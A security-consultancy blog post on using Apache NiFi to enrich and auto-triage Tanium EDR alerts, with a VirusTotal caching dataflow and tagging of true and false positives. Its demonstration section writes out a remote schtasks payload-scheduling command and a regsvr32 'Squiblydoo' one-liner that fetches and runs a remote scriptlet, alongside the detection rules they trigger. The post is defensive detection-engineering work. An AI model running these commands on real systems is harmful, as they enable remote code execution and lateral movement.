Signal the ATT&CK: Part 2

05/07/18

Start adding items to your reading lists:
or
Save this item to:
This item has been saved to your reading list.

Using orchestration and automation to enhance EDR capabilities, and to reduce ‘alert fatigue’

By Paul Bottomley, Endpoint Threat Detection and Response Lead, and
Wietze Beukema, Endpoint Threat Detection and Response Analyst.

Introduction

This is the second part of our ‘Signal the ATT&CK’ article, where we explore security orchestration and automation (collectively referred to as orchestration) and its use in enhancing our Endpoint Detection and Response (EDR) capability. In part 1, we discussed the use of the MITRE ATT&CK matrix and MITRE’s CALDERA in our Tanium Signal development and testing process. Since part 1 was published, we have added 150 Signals to our rule base, which takes the total number of Signals in our detection set to well over 500. Our current ATT&CK coverage can be seen in the diagram below, which is taken from the ATT&CK Navigator. Techniques we have developed Signals for are highlighted in green. Those highlighted in grey we deem out of scope from an endpoint threat detection perspective, and better suited to other technologies such as Network Intrusion Detection Systems (NIDS).

Our journey into orchestration began when redesigning our back-end EDR platform. The high level concept was to take Tanium Signal alerts and pass them through a scalable data processing pipeline where they would be committed to an Elasticsearch cluster for a team of analysts to triage. The approach we took made use of human-centered design, “...a human-centered approach fuels the creation of products that resonate more deeply with an audience — ultimately driving engagement and growth”. This concept is important because many products fail - not because they fail to build what they set out to, but because the wrong product has been built that doesn’t take into account what the problem is and why the problem matters.

The human perspective of the design process began with creating personas. We defined multiple ‘threat detection analyst’ personas that very quickly surfaced a number of interesting behaviours and pain-points, two of which we will focus on in this article that relate to orchestration:

  1. Alert overload - Commonly referred to as ‘alert fatigue’, this is where analysts are inundated with detections. Ultimately, this leads to an increase in operational risk due to detections being overlooked; and,

  2. Frustration of manual enrichment - Having to manually lookup indicators against threat intelligence datasets, and manually pull related endpoint artefacts.

These two pain-points led to the following design principles:

  1. [Alert overload] - The platform needs to suppress known false positive (FP) events;

  2. [Alert overload] - The platform needs to auto-categorise known true positive (TP) events;

  3. [Frustration of manual enrichment] - The platform needs to automatically enrich indicators against threat intelligence datasets; and,

  4. [Frustration of manual enrichment] - The platform needs to automatically acquire related process, network, file and Windows Registry artefacts.

For the remainder of this article, points 3 and 4 will be commonly referred to as ‘enrichment’.

By considering these design principles, we sought to identify a highly configurable component that would act as a layer of connective tissue within our threat detection ecosystem, allowing us to automate the flow of data between systems and execute decisions. This led us to Apache NiFi (“NiFi”).

Automating enrichment and reducing alert fatigue using NiFi

NiFi is an open-source dataflow automation tool, maintained by the Apache Software Foundation. The Java-powered software uses flow-based programming concepts to perform a sequence of tasks based on information it processes. Simply put, it is a tool that manages the flow and transformation of information between systems.

NiFi’s flow-based approach makes it a powerful means to manage complex dataflows - its graphical interface visualises the flow of data in real-time, identifies current bottlenecks, and provides the flexibility to modify flows. In addition, due to its highly scalable structure, it is both efficient and flexible when handling high volumes of data. 

Data in NiFi takes the form of flowfiles, which consist of content (the actual data) and supporting attributes. At the start of a dataflow, the flowfile only contains raw data, and at the end of a dataflow it is typically transformed and enriched. This is achieved using processors, which are used to consume, analyse and transform data. Out of the box, NiFi includes a comprehensive set of processors, which allows seamless integration to existing data sources such as SQL-based databases, Elasticsearch, MongoDB and Kafka instances. These capabilities make NiFi a very powerful tool for orchestration.

Over the last few months, we’ve been implementing our design principles in a NiFi dataflow. Tanium Signal alerts, as well as broad sets of telemetry acquired using the Tanium platform (for example running process details, driver details, and loaded module details) are passed through a scalable pipeline before being indexed in an Elasticsearch cluster. NiFi connects to Elasticsearch and the dataflow begins execution.

To explain orchestration in our context, we will describe one of our dataflow components, VirusTotal enrichment, which addresses design principle 3: the platform needs to automatically enrich indicators against threat intelligence datasets.

Automatically enriching indicators against VirusTotal

Our threat intelligence is derived through research conducted by our in-house experts, informed by our global incident response services and a large global network of trusted intelligence sharing relationships. We also enrich against external sources, one being VirusTotal, which we will discuss in this article.

The purpose of this dataflow component, which comprises multiple processors, is to enrich documents in our Elasticsearch cluster that have an MD5 hash with information from VirusTotal. It is inevitable an MD5 hash will be common across multiple systems, so to ensure we are efficient in our enrichment, we maintain a local cache with VirusTotal results. Every time we want to enrich an MD5 hash, we check the cache first before querying the VirusTotal API. 

At a high level, the dataflow logic is:

  1. Retrieve MD5 hashes that are to be enriched;
  2. Perform a lookup against the VirusTotal cache - if information about the MD5 hash already exists, retrieve it; else query the VirusTotal API; and,
  3. Update Elasticsearch.

At a more granular level, the steps performed by NiFi are:

  1. Get Unprocessed MD5s: Query Elasticsearch for documents that have the md5 field set and do not have the vt_enriched field set.
        a. For each unique MD5 hash found, check if the MD5 appears in our VirusTotal cache.
            i. If the hash is found in our cache, set the vt_enriched attribute to ‘Yes’ and add the attributes found in the VirusTotal cache to the flowfile. Then forward the flowfile to ‘MD5s already in cache’; or,
            ii.If the hash is not found in our cache, set the vt_enriched attribute to ‘No’. Then forward the flowfile to ‘MD5s not in cache’.
  2. VT Enrichment: This is a progress group that queries the VirusTotal API - it is discussed in more detail below;
  3. Generate Output: Transform the flowfile attributes provided by the previous step. This includes, amongst other things, the removal of irrelevant information provided by VirusTotal, the renaming of fields, and the creation of additional fields; and,
  4. Bulk Update MD5s: Commit the changes to Elasticsearch. Every incoming flowfile has an MD5 hash and a set of attributes; this step will update every unprocessed document in Elasticsearch with the same MD5 hash with the given attributes.

The VT Enrichment process group is mainly responsible for querying the VirusTotal API and updating our VirusTotal cache. In addition, it also contains logic to call the VirusTotal API to request re-analysis of MD5 hashes if certain conditions are met.

The steps for the VT Enrichment group are:

  1. Query VT Report API:
        a. Get MD5 hashes from the MD5s input port;
        b. Group the MD5 hashes, and query the VirusTotal Report API;
        c.Parse the results and add them as flowfile attributes; and,
        d. Forward the flowfile to VT Answered.
  2. Update VT Cache: For each flowfile, create a new document in our VirusTotal cache with the flowfile’s attributes as fields.
  3. Check VT Rescan Necessity: various checks are carried out to determine whether or not an MD5 hash should be rescanned. For example, if the last scan date is greater than 30 days, and various other conditions hold, a rescan will be necessary.
        a. If no rescan is required, forward the flowfile to No Rescan Required; or,
        b. If a rescan is required, forward the flowfile to Rescan Necessary.
  4. Request VT Rescan:
        a. Get flowfiles from the Rescan Necessary input;
        b. For each flowfile, check whether it has been for Rescan before.
            i. If it has, it means the MD5 hash was sent for rescan but the new results were not yet ready after 10 minutes. To wait another 10 minutes, the flowfile is forwarded to Rescan Request Successful straight away; or,
            ii. If it has not, continue.
        c. Group the MD5 hashes, and query the VirusTotal Rescan API;
        d. Parse the results to ensure the rescan was requested successfully; and,
        e. Forward the flowfiles to Rescan Request Successful.
  5. Wait: Hold the incoming flowfiles for 10 minutes, before releasing them back to Query VT Report API. This allows VirusTotal to re-analyse the file belonging to the MD5 hash.

Whenever something unexpected happens (for example, the VirusTotal API gives an invalid HTTP response code), the affected flowfiles are forwarded to failure, as is also shown in the diagram. Using another set of processors, we log such events, or even notify an analyst straight away via email or Slack integration. 

Orchestration in action

We will reuse two of the attacker techniques described in part 1 of our blog series to demonstrate our orchestration. Please refer to Microsoft MSDN documentation for a full description of the parameters used in the following examples.

Scheduled Task

The first example demonstrates the use of schtasks.exe to create the named task ‘myTask’ on remote machine ‘tanium-agent-4’. The execution of this task, which runs under the context of ‘user1’, is set to run daily and invokes ‘c:\windows\temp\payload.exe’.

schtasks.exe /s tanium-agent-4 /u user1 /p <password> /create /tn myTask /tr c:\windows\temp\payload.exe /sc DAILY

Executing this command will trigger the following Signal:

[lateral_movement]-[medium]-remote_scheduled_task_creation_using_schtasks

Without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst and not practical to review given no enhanced formatting has been applied. The main focus of triage when this Signal fires is to determine the nature of the payload, in this example ‘c:\windows\temp\payload.exe’.

Taking the pain point ‘frustration of manual enrichment’, our goal is to provide the analyst with a richer and more comprehensive understanding of the alert, which increases the degree of confidence when analysing the detection. Orchestration in this context involves:

  1. Calculating the MD5 hash of  ‘c:\windows\temp\payload.exe’ on ‘tanium-agent-4’, sending the hash to a threat intelligence reputation engine and appending intelligence results to the alert; and,
  2. If applicable (a decision based on the result of action #1), pulling related endpoint artefacts.

Once our NiFi dataflow has processed this alert, the detection looks very different in our platform. The analyst is presented with a nicely parsed process tree and can conclude ‘c:\windows\temp\payload.exe’ is malicious based on the ‘schtask_outcome’ field reporting the executable file as ‘mimikatz’.

Pulling related endpoint artefacts on the schtasks.exe process did not yield any further context in this example.

We have also created the ability for an analyst to mark a detection as ‘good’, ‘suspicious’ or ‘bad’ and even attribute a detection to a threat actor using our ‘tagging’ functionality. In this example, the analyst marks the detection as malicious. Not only will this tag the current event, but the workflow in NiFi will retrospectively tag all historic detections in the platform that are identical to this detection.

Let’s trigger this alert again. Our NiFi dataflow takes care of the subsequent detection by auto-categorising this alert as malicious. The detection is a known TP event and addresses the pain point ‘alert overload’ - the analyst will not have to review this subsequent alert, it is automatically reported on a high severity findings dashboard. This logic is also the basis for suppressing known FPs - if the same detections have been marked as ‘good’ by multiple analysts, future detections will be auto-categorised.

Regsvr32

The following example demonstrates the use of  regsvr32.exe to download the remote Windows scriptlet file ‘http://remote_server/payload.sct’.

regsvr32.exe /u /n /s /i:http://remote_server/payload.sct scrobj.dll

Executing this command will trigger the following Signals:

[execution]-[high]-regsvr32_making_suspicious_outbound_connections
[evasion]-[high]-regsvr32_calling_scrobj.dll_-_whitelist_bypass
[evasion]-[high]-regsvr32_interacts_with_sct_file_(possible_Squiblydoo_attack)

Again, without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst. The focus when this group of Signals fire would be to determine the reputation of the remote server the sct file is being pulled from, and subsequent system activity as a result of the execution of ‘regsvr32.exe’.

Orchestration in this example involves:

  1. Performing a reputation check of ‘http://remote_server’ by sending the URL to a threat intelligence reputation engine and appending intelligence results to the alert; and,
  2. If applicable (based on the result of 1), retrieving related endpoint artefacts.

If a local file was passed as a command line argument (rather than as a URL), another step in the orchestration process could be to determine the nature of the payload.

Once again, the detection looks very different in our platform now that our NiFi dataflow has processed this alert. The analyst can conclude straight away the URL is malicious based on the ‘script_outcome’ field reporting a result of ‘malicious’, without having to carry out manual lookups on the URL or the file.

We have also retrieved related endpoint artefacts as a result of regsvr32.exe executing. We observe a ‘.sct’ file being written to disk, a process spawn (‘calc.exe’), and a network connection.

Lastly, an analyst has the ability to comment as well as tag detections. The comment can be used as an explanation of why the analyst has tagged the event as such, and support reporting.

Conclusion

In summary, incorporating NiFi in our EDR process helps us in multiple ways:

  1. To reduce analyst alert fatigue by suppressing known FP detections;
  2. To reduce analyst alert fatigue by auto-categorising known true positive (TP) events; and,
  3. To provide analysts with context of a detection by applying threat intelligence and pulling related endpoint artefacts.


Additional insight from Tanium

Tanium’s Cyber Security team have written two articles on applying the ATT&CK matrix when building a detection capability. They discuss developing a mechanism to identify gaps in capability and assigning corresponding risks to those gaps. More information can be found at the following links:

https://www.tanium.com/blog/getting-started-with-the-mitre-att-and-ck-framework-lessons-learned/

https://www.tanium.com/blog/getting-started-with-the-mitre-attack-framework-improving-detection-capabilities/


Tanium CONVERGE

Join us at Tanium CONVERGE in Washington D.C November 12-15 where we will be presenting ‘Signal the ATT&CK’ in greater depth. This will be a fantastic opportunity to meet our EDR team and exchange ideas.

Get in touch

Are you running Tanium in your network? We are more than happy to discuss security orchestration and automation in more depth with you, and about how PwC can help enhance your security capability through this. We also have a comprehensive set of over 500 Signals which are available on a subscription basis - our current coverage against the ATT&CK matrix is highlighted in diagram above.

For more information, drop an email to Paul or Wietze using the contact details below.

Contact us

Paul Bottomley
Endpoint Threat Detection and Response Lead, PwC United Kingdom
Tel: +44 (0)7808 799134
Email

Wietze Beukema
Endpoint Threat Detection and Response Analyst, PwC United Kingdom
Tel: +44 (0)7850 908221
Email